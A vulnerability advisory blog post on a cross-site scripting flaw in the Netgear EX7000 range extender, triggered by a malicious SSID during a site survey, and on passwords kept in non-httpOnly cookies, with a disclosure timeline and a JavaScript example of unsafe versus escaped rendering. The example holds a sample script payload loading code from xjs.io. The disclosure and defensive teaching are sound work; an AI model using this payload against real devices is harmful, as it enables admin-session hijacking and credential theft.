Blog: Vulnerability Advisory

Netgear EX7000 Wi-Fi Range Extender. Minor XSS and Poor Password Handling

Jamie Riden 15 Nov 2016

Netgear was informed of this issue on 4th June 2016. Fixed firmware is now available, but I’m not sure when it was released as they didn’t tell me.

Hardware Version: EX7000

Firmware Version affected: V1.0.0.42_1.0.94 (and probably earlier versions as well)

Firmware updates are here (or use the firmware check function in the device’s web interface): http://www.netgear.com/support/product/EX7000.aspx?cid=wmt_netgear_organic#download

It was possible to conduct a cross-site scripting attack against the EX7000 AC1900 extender with the then-current firmware. If you create an SSID whose name carries a script payload that loads code from http://xjs.io, and then perform a network discovery (site survey) from the extender’s web interface, that code will execute when you move the mouse over the network name.


While doing this, it became apparent that the “remember me” option stores the username and password in cookies, without marking them “httpOnly”.

Now, I do appreciate that the attacker needs to be within radio range of the device while a site survey is being performed, so that the malicious SSID shows up in the list, so it’s not a major issue by any means. It does serve to illustrate that any data you accept from the outside world needs to be validated, and encoded for the context it is written into, not just the direct input parameters of the web application.
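The following is an added example, not Netgear’s firmware code and not the proof of concept mentioned below (which was never released). It shows why a surveyed SSID is just another untrusted input: the same list rendered by string concatenation and by context-aware escaping. The scan results, function names and the sample payload are constructed for illustration; the only detail taken from the advisory is that the payload loads code from http://xjs.io.

```javascript
// Added example; not Netgear's firmware code and not the advisory's PoC.
// Shows why an SSID taken from a site survey is just another untrusted
// input, and what escaping it for HTML does to the payload.

const MAX_SSID_BYTES = 32; // 802.11 SSID limit: the whole payload must fit here

// Constructed scan results. The second entry carries a script element that
// loads code from http://xjs.io, the mechanism the advisory describes.
const scanResults = [
  { ssid: "NETGEAR_EXT", signal: 70 },
  { ssid: "<script src=//xjs.io></script>", signal: 41 },
];

// Vulnerable rendering (assumed to resemble the original flaw): the SSID is
// concatenated straight into markup, so a script element in the name becomes
// a script element in the admin page.
function renderUnsafe(results) {
  return results
    .map((r) => `<li title="${r.ssid}">${r.ssid} (${r.signal}%)</li>`)
    .join("\n");
}

// Escape the characters that can break out of element content or a
// double-quoted attribute value.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: encode for the output context and coerce the numeric
// field, so nothing from the survey is interpreted as markup.
function renderSafe(results) {
  return results
    .map((r) => {
      const name = escapeHtml(r.ssid);
      return `<li title="${name}">${name} (${Number(r.signal)}%)</li>`;
    })
    .join("\n");
}

// UTF-8 length of an SSID; anything over 32 bytes cannot be broadcast,
// which bounds what an attacker can fit in a single network name.
function ssidByteLength(ssid) {
  return Buffer.byteLength(ssid, "utf8");
}

// Quick check on rendered markup: does an executable script element survive?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log(renderUnsafe(scanResults)); // the script element is live markup
console.log(renderSafe(scanResults));   // the same SSID, now inert text
```

The 32-byte limit is the one real constraint on the attacker here: a remote script include fits comfortably, which is why a short domain is all the payload needs. The fix is output encoding at the point where the SSID is written into the page; trying to “validate” SSIDs on input is the wrong layer, since any byte string up to 32 bytes is a legal SSID.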

As a proof of concept, I wrote some JavaScript code which mimics the normal configuration of the extended wireless network and creates a 2.4GHz network called “FREEWIFI” with no encryption or authentication. Another piece of JavaScript was tested which removes the password from the web interface. (We won’t be releasing these until the firmware is actually updated.)

Users should upgrade their firmware. Until then, be careful when performing wireless surveys from the EX7000’s web interface, and do not use the Remember Me function.

Netgear also needs to find a better way of remembering the user across sessions. Storing the password in a cookie is a really bad idea, and not marking it “httpOnly”, which would stop client-side JavaScript from reading it, just makes it worse. Note that httpOnly only stops the script from reading the cookie; a script running in the admin page can still drive the interface with the user’s existing session, as the proof-of-concept above does, so it is a mitigation for credential theft and not a fix for the XSS itself.

Timeline

4th June 2016 – notified vendor

<Some to’ing and fro’ing>

26th July 2016 – vendor says this issue will hopefully be addressed in due course.

“We do have a Field Trial release available and the vulnerability issue has been addressed. The next maintenance release will include this resolution.”

11th November 2016 – Having heard nothing further, I checked to see if any updates were available. The XSS-in-SSID issue appears to be fixed.